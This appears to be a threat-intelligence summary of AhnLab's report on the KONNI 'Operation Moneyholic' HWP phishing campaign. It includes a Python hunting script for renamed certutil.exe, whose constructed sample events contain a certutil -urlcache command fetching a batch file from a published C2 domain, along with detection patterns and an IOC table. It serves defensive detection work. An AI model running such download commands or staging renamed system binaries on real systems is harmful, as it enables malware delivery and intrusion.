Operation Moneyholic with HWP Document

2019-09-19 AhnLab

https://asec.ahnlab.com/1251


Operation Moneyholic, tracked internationally as KONNI, used spear-phishing HWP documents against cryptocurrency exchanges and their users. The HWP file embedded an EPS object that exploited CVE-2017-8291, a -dSAFER sandbox bypass in the Ghostscript interpreter that HWP invokes to render EPS, to run encrypted shellcode that downloaded VBScript and batch files from attacker C2 infrastructure.

The downloaded scripts copied certutil.exe as ct.exe, established startup persistence, collected host and system information, uploaded files named after the victim's computer name, and conditionally downloaded additional malware. AhnLab linked the tooling to an earlier sendfile.exe-based campaign and noted that the group used the stolen information to deploy follow-on malware such as Amadey RAT when a target was judged valuable.
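
The durable hunting signal in this chain is the staging of certutil.exe under another name: a binary whose PE version resource says CertUtil.exe but whose on-disk name is ct.exe, plus the shell command that made the copy. The script below is an added example written for this summary, not code from the AhnLab report. The sample events are constructed to resemble Sysmon Event ID 1 (process creation) fields; the file paths, the -urlcache download switches and the URL path are assumptions (the report does not state which certutil switches the scripts used), and only the two domains come from the report's IOC table.

```python
"""
Hunting for a renamed certutil.exe (ct.exe in the Moneyholic chain) in
process-creation telemetry. Added example; events below are constructed.
"""
import os
import re

# Domains published in the report's IOC table.
IOC_DOMAINS = {"down1-naver.com", "filedownload2.com"}

# Constructed sample events (Sysmon EID 1 style). Events 0 and 3 are benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify C:\temp\cert.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd /c copy /y C:\Windows\System32\certutil.exe C:\Users\Public\ct.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Users\Public\ct.exe",           # assumed staging path
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"ct.exe -urlcache -split -f http://down1-naver.com/x.bat C:\Users\Public\x.bat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\ct.exe",           # same name, unrelated binary
     "OriginalFileName": "ct.exe",
     "CommandLine": r"ct.exe --help",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Shell verbs that relocate or rename a binary, with certutil.exe as the source
# somewhere later in the same command (stop at && / | to stay in one command).
COPY_RE = re.compile(
    r"\b(copy|xcopy|move|ren|rename|copy-item|move-item)\b[^&|]*certutil\.exe",
    re.IGNORECASE)
# certutil's URL-cache fetch, the usual living-off-the-land download (assumed here).
DOWNLOAD_RE = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)


def image_basename(path: str) -> str:
    """Basename of a Windows path, independent of the OS running this script."""
    return os.path.basename(path.replace("\\", "/")).lower()


def is_renamed_certutil(ev: dict) -> bool:
    """Version resource says CertUtil.exe, but the file on disk is called something else."""
    return (ev.get("OriginalFileName", "").lower() == "certutil.exe"
            and image_basename(ev.get("Image", "")) != "certutil.exe")


def copies_certutil(ev: dict) -> bool:
    """Command line that copies or renames certutil.exe (the ct.exe staging step)."""
    return COPY_RE.search(ev.get("CommandLine", "")) is not None


def certutil_download(ev: dict) -> bool:
    """certutil, under any file name, fetching a URL."""
    return (ev.get("OriginalFileName", "").lower() == "certutil.exe"
            and DOWNLOAD_RE.search(ev.get("CommandLine", "")) is not None)


def contacts_ioc_domain(ev: dict) -> bool:
    """A published C2 domain appears in the command line."""
    cmd = ev.get("CommandLine", "").lower()
    return any(d in cmd for d in IOC_DOMAINS)


RULES = {
    "renamed_certutil": is_renamed_certutil,
    "certutil_copied": copies_certutil,
    "certutil_download": certutil_download,
    "ioc_domain": contacts_ioc_domain,
}


def triage(events) -> list:
    """Return (event_index, [rule names]) for every event that fires at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits.append((i, fired))
    return hits


if __name__ == "__main__":
    for i, fired in triage(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(fired)}  <- {SAMPLE_EVENTS[i]['CommandLine']}")
```

The OriginalFileName check catches any name the attacker picks, not just ct.exe, but it relies on the PE version resource being intact; an attacker who patches that resource defeats it, which is why the copy command and the known hash of certutil.exe for the victim's Windows build are worth alerting on independently. Domain matching is the weakest of the four rules, since the IOC table only records the two domains observed on the report date.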

Indicators of Compromise

Type    Value               First Seen   Last Seen
DOMAIN  down1-naver.com     2019-09-19   2019-09-19
DOMAIN  filedownload2.com   2019-09-19   2019-09-19
